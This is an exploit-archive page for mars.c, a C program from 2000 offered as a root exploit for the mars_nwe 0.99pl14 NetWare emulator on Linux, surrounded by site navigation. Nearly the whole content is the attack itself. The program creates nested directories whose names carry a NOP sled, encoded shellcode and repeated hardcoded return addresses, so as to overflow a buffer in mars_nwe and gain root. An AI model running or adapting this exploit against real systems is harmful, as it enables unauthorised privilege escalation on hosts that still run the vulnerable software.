mars.c

mars.c: Posted Apr 4, 2000; Authored by Venglin | Site b0f.freebsd.lublin.pl; mars_nwe 0.99pl14 root exploit (linux).; tags | root; systems | linux; SHA-256 | 1db24f34aca77024b88baaacbf9a1854e0ff4717e6afdfe44e406ecb090e7ea4; Download | Favorite | View

mars.c

/*
 * mars_nwe 0.99pl14 root exploit (linux)
 * (c) 1999 babcia padlina ltd. / buffer0verfl0w security (b0f.morphed.net)
 *
 * 
*/

#include <stdio.h>
#include <errno.h>
#include <sys/stat.h>
#include <strings.h>
#include <unistd.h>

#define BUFSIZE    254
#define NOP    0x90
#define RET    0xbffff3a0
#define ALIGN    1

int makedir(dir)
char *dir;
{

  if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
    return -1;

  if (chdir(dir))
    return -1;

  return 0;
}
  

int main(void)
{
  int i = 0, noplen = 0;
  char pid[10], buf[BUFSIZE], *ptr = NULL;

  char szelkod[] =

    "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d"
    "\x31\xc9\xb1\x88\x80\x36\x01\x46\xe2\xfa\xea\x19\x2e"
    "\x63\x68\x6f\x2e\x62\x69\x6c\x6e\x65\x01\x35\x36\x34"
    "\x34\x01\x2e\x63\x68\x6f\x2e\x72\x69\x01\x88\xf7\x54"
    "\x88\xe4\x82\xed\x19\x56\x57\x52\xe9\x01\x01\x01\x01"
    "\x5a\x80\xc2\xcf\x11\x01\x01\x8c\xba\x0b\xee\xfe\xfe"
    "\x88\x7c\xf1\x8c\x82\x14\xee\xfe\xfe\x88\x44\xf5\x8c"
    "\x92\x1b\xee\xfe\xfe\x88\x54\xf9\xc6\x44\xfd\x01\x01"
    "\x01\x01\xb9\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88"
    "\xf2\xcc\x81\x8c\x44\xf1\x88\xc0\xb9\x0a\x01\x01\x01"
    "\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x8c\x64\xdd\x5a"
    "\x5f\x5e\xc8\xc2\x91\x91\x91\x91\x91\x91\x91\x91\x91"
    "\x91\x91\x91\x00";

  sprintf(pid, "%d", getpid());

  if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO)))
  {
    perror("mkdir()");
    return -1;
  }

  if (chdir(pid))
  {
    perror("chdir()");
    return -1;
  }

  ptr = buf;
  noplen = BUFSIZE - strlen(szelkod);

  for (i=0;i<noplen;i++)
    *ptr++ = NOP;

  *ptr += noplen;

  for (i=0;i<strlen(szelkod);i++)
    *ptr++ = szelkod[i];

  *ptr = '\0';

  if(makedir(buf) < 0)
  {
    perror("makedir()");
    return -1;
  }

  bzero(buf, BUFSIZE);
  memset(buf, NOP, 40 + ALIGN);

  if(makedir(buf) < 0)
  {
    perror("makedir()");
    return -1;
  }

  bzero(buf, BUFSIZE);

  for(i=0;i<96;i+=4)
    *(long *)&buf[i] = RET;

  for(i=0;i<2;i++)
  {

    if(makedir(buf) < 0)
    {
      perror("makedir()");
      return -1;
    }
  }

  return 0;
}

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 64 files
Debian 22 files
Gentoo 8 files
Google Security Research 7 files
LiquidWorm 6 files
Apple 5 files
Jann Horn 3 files
Spencer McIntyre 3 files
Milad Karimi 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,175)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,140)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,480)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,022)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

mars.c

mars.c

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

mars.c

Share This

mars.c

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems